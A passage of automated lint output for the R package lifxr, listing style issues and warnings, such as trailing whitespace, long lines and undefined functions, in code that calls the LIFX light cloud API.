^\n```\n[R/lifx-cloud.R:38:16:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n​# except color. \n               ^\n```\n[R/lifx-cloud.R:43:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:51:5:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(results$status_code != 200)\n    ^\n```\n[R/lifx-cloud.R:58:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:60:74:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L60) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @param selector a string in format '[type]:[value]', where type can be \n                                                                         ^\n```\n[R/lifx-cloud.R:61:73:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' 'all', 'id', 'label', 'group', 'group_id', 'location', 'location_id', \n                                                                        ^\n```\n[R/lifx-cloud.R:63:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L63) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' which needs no value argument. \n                                 ^\n```\n[R/lifx-cloud.R:64:56:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L64) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @return a list of all lights, status, and properties \n                                                       ^\n```\n[R/lifx-cloud.R:74:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L74) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:80:17:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L80) *warning:* **no visible global function definition for ‘lights’, Did you mean 'weights'?**\n```r\n​  light_list <- lights(selector = selector)\n                ^~~~~~\n```\n[R/lifx-cloud.R:81:21:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L81) *style:* **Trailing whitespace is superfluous.**\n```r\n​  sapply(light_list, \n                    ^\n```\n[R/lifx-cloud.R:83:14:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​           if(light$color[[\"saturation\"]] > 0)\n             ^\n```\n[R/lifx-cloud.R:89:18:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​             else \n                 ^\n```\n[R/lifx-cloud.R:90:32:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​               paste(\"kelvin:\", \n                               ^\n```\n[R/lifx-cloud.R:91:46:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L91) *style:* **Trailing whitespace is superfluous.**\n```r\n​                     light$color[[\"kelvin\"]], \n                                             ^\n```\n[R/lifx-cloud.R:93:50:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L93) *style:* **Trailing whitespace is superfluous.**\n```r\n​                     light$brightness * 100, \"%\", \n                                                 ^\n```\n[R/lifx-cloud.R:100:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L100) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:106:67:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L106) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- POST(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \n                                                                  ^\n```\n[R/lifx-cloud.R:107:42:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L107) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         \"/toggle.json\"), \n                                         ^\n```\n[R/lifx-cloud.R:109:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L109) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:113:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L113) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:119:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L119) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @details Not exported because it conflicts with stats::power. see on() and off()\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:122:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L122) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:122:82:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L122) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n                                                                                 ^\n```\n[R/lifx-cloud.R:123:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L123) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(power = state, \n                                 ^\n```\n[R/lifx-cloud.R:124:40:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​                   duration = duration, \n                                       ^\n```\n[R/lifx-cloud.R:126:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L126) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:131:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L131) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:138:10:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L138) *warning:* **possible error in power(\"off\", selector = selector, duration = duration): unused arguments (selector = selector, duration = duration)**\n```r\n​  power(\"off\", selector = selector, duration = duration)\n         ^~~\n```\n[R/lifx-cloud.R:143:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L143) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:144:19:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L144) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' power lights on \n                  ^\n```\n[R/lifx-cloud.R:150:10:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L150) *warning:* **possible error in power(\"on\", selector = selector, duration = duration): unused arguments (selector = selector, duration = duration)**\n```r\n​  power(\"on\", selector = selector, duration = duration)\n         ^~\n```\n[R/lifx-cloud.R:155:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L155) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:159:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L159) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param power_on should the light be powered on if it is off? (FALSE just leaves light off)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:161:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L161) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @details Note that the kelvin temperature ranges from 2700 to 8000. Hue in HSB list is \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:161:90:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L161) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @details Note that the kelvin temperature ranges from 2700 to 8000. Hue in HSB list is \n                                                                                         ^\n```\n[R/lifx-cloud.R:162:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L162) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' a number between 0 and 360, whereas saturation and brightness should be between 0 and 1.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:163:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L163) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:165:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L165) *style:* **Lines should not be more than 80 characters.**\n```r\n​#'  color(\"green\", \"label:desk\")   # deep green, brightness untouched on lights labeled 'desk'\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:168:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L168) *style:* **Lines should not be more than 80 characters.**\n```r\n​#'  color(\"random\")                # random hue, maximum saturation, brightness untouched\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:175:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L175) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:175:82:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n                                                                                 ^\n```\n[R/lifx-cloud.R:176:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L176) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(color = color, \n                                 ^\n```\n[R/lifx-cloud.R:177:40:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L177) *style:* **Trailing whitespace is superfluous.**\n```r\n​                   duration = duration, \n                                       ^\n```\n[R/lifx-cloud.R:180:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L180) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:185:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L185) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:187:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L187) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param from_color Same syntax as color, defaults to current color (of first bulb in selection)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:190:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L190) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param persist should the color persist after the effect? default is FALSE (returns to original color)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:197:65:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L197) *style:* **Trailing whitespace is superfluous.**\n```r\n​breathe <- function(color, from_color = current_color(selector), \n                                                                ^\n```\n[R/lifx-cloud.R:200:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L200) *style:* **Trailing whitespace is superfluous.**\n```r\n​  settings <- list(color = color, \n                                 ^\n```\n[R/lifx-cloud.R:208:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L208) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- POST(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/effects/breathe\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:210:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L210) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:214:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L214) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:217:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L217) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param duty_cycle Ratio of the period where color is active. Only used for pulse. Defaults to 0.5. Range: 0-1\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:220:68:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L220) *style:* **Trailing whitespace is superfluous.**\n```r\n​pulse <- function(color, from_color = current_color(selector)[[1]], \n                                                                   ^\n```\n[R/lifx-cloud.R:223:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L223) *style:* **Trailing whitespace is superfluous.**\n```r\n​  settings <- list(color = color, \n                                 ^\n```\n[R/lifx-cloud.R:231:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L231) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- POST(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/effects/pulse.json\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:233:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L233) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:237:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L237) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:244:71:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L244) *style:* **Trailing whitespace is superfluous.**\n```r\n​  PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/label.json\"), \n                                                                      ^\n```\n[R/lifx-cloud.R:245:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L245) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(label = label, \n                                 ^\n```\n[R/lifx-cloud.R:250:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L250) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:258:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L258) *style:* **Lines should not be more than 80 characters.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/scenes/scene_id:\", scene_id, \"/activate.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:258:94:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- PUT(paste0(BASE, \"/\", VERSION, \"/scenes/scene_id:\", scene_id, \"/activate.json\"), \n                                                                                             ^\n```\n[R/lifx-cloud.R:259:34:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L259) *style:* **Trailing whitespace is superfluous.**\n```r\n​      query = list(state = state, \n                                 ^\n```\n[R/lifx-cloud.R:260:40:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L260) *style:* **Trailing whitespace is superfluous.**\n```r\n​                   duration = duration, \n                                       ^\n```\n[R/lifx-cloud.R:262:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L262) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:266:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L266) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:272:24:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L272) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​    jsonlite::fromJSON(content(results, as = \"text\"))\n                       ^~~~~~~\n```\n[R/lifx-cloud.R:281:44:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L281) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' @return hsbk information for the string. \n                                           ^\n```\n[R/lifx-cloud.R:284:55:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L284) *style:* **Trailing whitespace is superfluous.**\n```r\n​  results <- GET(paste0(BASE, \"/\", VERSION, \"/color\"), \n                                                      ^\n```\n[R/lifx-cloud.R:287:22:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L287) *warning:* **no visible global function definition for ‘content’, Did you mean 'confint'?**\n```r\n​  jsonlite::fromJSON(content(results, as = \"text\"))\n                     ^~~~~~~\n```\n[R/lifx-cloud.R:291:3:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L291) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/lifx-cloud.R:293:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L293) *style:* **Lines should not be more than 80 characters.**\n```r\n​#' @param power either on or off, defaults to on, makes not sense to shut the light off and change the color\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:299:66:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L299) *style:* **Trailing whitespace is superfluous.**\n```r\n​set_state <- function(selector =\"all\", power = \"on\", color= NULL, \n                                                                 ^\n```\n[R/lifx-cloud.R:302:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n      ^\n```\n[R/lifx-cloud.R:302:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n                            ^\n```\n[R/lifx-cloud.R:302:44:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *warning:* **no visible global function definition for ‘check_brightness’**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n                                           ^~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:302:72:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L302) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    if(!is.null(brightness)){brightness <- check_brightness(brightness)}\n                                                                       ^\n```\n[R/lifx-cloud.R:303:7:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n      ^\n```\n[R/lifx-cloud.R:303:29:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n                            ^\n```\n[R/lifx-cloud.R:303:44:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *warning:* **no visible global function definition for ‘check_saturation’**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n                                           ^~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:303:72:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L303) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    if(!is.null(saturation)){brightness <- check_saturation(saturation)}\n                                                                       ^\n```\n[R/lifx-cloud.R:304:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L304) *style:* **Lines should not be more than 80 characters.**\n```r\n​    #if(grepl(\"hue\", color)){} # extract hue and check for hue:number and check hue.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:304:6:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L304) *style:* **Commented code should be removed.**\n```r\n​    #if(grepl(\"hue\", color)){} # extract hue and check for hue:number and check hue.\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:305:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L305) *style:* **Lines should not be more than 80 characters.**\n```r\n​    result <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:305:83:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L305) *style:* **Trailing whitespace is superfluous.**\n```r\n​    result <- PUT(paste0(BASE, \"/\", VERSION, \"/lights/\", selector, \"/state.json\"), \n                                                                                  ^\n```\n[R/lifx-cloud.R:307:37:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L307) *style:* **Put spaces around all infix operators.**\n```r\n​                               color= color,\n                                   ~^\n```\n[R/lifx-cloud.R:310:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L310) *style:* **Lines should not be more than 80 characters.**\n```r\n​                               saturation = saturation, # doesn't work. because needs to be in color.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/lifx-cloud.R:315:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L315) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/lifx-cloud.R:316:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-cloud.R#L316) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/lifx-server.R:1:1:](https://github.com/RMHogervorst/lifxr/blob/6c37fb608513b781baa08a6dfae3b8ababd328af/R/lifx-server.R#L1) *style:* **Lines should not be more than 80 characters.**\n```r\n​# ## These functions are designed to work with a local server only, which must be running 